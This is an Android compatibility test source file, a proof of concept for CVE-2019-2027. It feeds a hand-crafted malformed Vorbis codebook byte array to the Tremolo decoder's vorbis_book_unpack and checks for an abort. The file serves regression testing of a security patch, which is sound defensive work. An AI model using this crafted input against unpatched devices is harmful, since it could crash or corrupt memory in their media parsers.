unplugged-system/cts/hostsidetests/securitybulletin/securityPatch/CVE-2019-2027/poc.cpp

/**
 * Copyright (C) 2021 The Android Open Source Project
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "../includes/common.h"

#define REF_COUNT 1

extern "C" {
#include <Tremolo/codebook.h>
}

bool testInProgress = false;
struct sigaction new_action, old_action;
void sigabrt_handler(int signum, siginfo_t *info, void* context) {
    if (testInProgress && info->si_signo == SIGABRT) {
        (*old_action.sa_sigaction)(signum, info, context);
        return;
    }
    _exit(EXIT_FAILURE);
}

unsigned char data[] = {/* 24 bits to make sure the alignment is correct */
                        0x42, 0x43, 0x56,
                        /* 16 bits for codebook.dim */
                        0x40, 0x00,
                        /* 24 bits for codebook.entries */
                        0x10, 0x00, 0x00,
                        /* 1 bit for ordering which is unset for unordered */
                        /* 1 bit set for specifying unused entries */
                        /* 1 bit for valid length */
                        /* 5 bits for length of entry */
                        0x06,
                        /* 1 bit for valid length */
                        /* 5 bits for length of entry */
                        /* 2 bits for specifying invalid length for next 2 entries */
                        0x01,
                        /* 8 bits for specifying invalid length for next 8 entries */
                        0x00,
                        /* 4 bits for specifying invalid length for next 4 entries */
                        /* 4 bits for specifying the map type 1 */
                        0x10,
                        /* 32 bits for codebook.q_min */
                        0x00, 0x00, 0x00, 0x00,
                        /* 32 bits for codebook.q_del */
                        0x00, 0x00, 0x00, 0x00,
                        /* 4 bits for codebook.q_bits */
                        /* 1 bit for codebook.q_seq */
                        /* 4 bits for quantized values of codebook.q_val for quantvals = 2 */
                        /* 7 bits remaining unused */
                        0x01, 0x00};

int main() {
    sigemptyset(&new_action.sa_mask);
    new_action.sa_flags = SA_SIGINFO;
    new_action.sa_sigaction = sigabrt_handler;
    sigaction(SIGABRT, &new_action, &old_action);

    ogg_buffer buf;
    ogg_reference ref;
    oggpack_buffer bits;
    codebook book = {};

    memset(&buf, 0, sizeof(ogg_buffer));
    memset(&ref, 0, sizeof(ogg_reference));
    memset(&bits, 0, sizeof(oggpack_buffer));

    buf.data = (uint8_t *)data;
    buf.size = sizeof(data);
    buf.refcount = REF_COUNT;

    ref.buffer = &buf;
    ref.length = sizeof(data);
    oggpack_readinit(&bits, &ref);

    testInProgress = true;
    FAIL_CHECK(vorbis_book_unpack(&bits, &book) == 0);
    testInProgress = false;
    return EXIT_SUCCESS;
}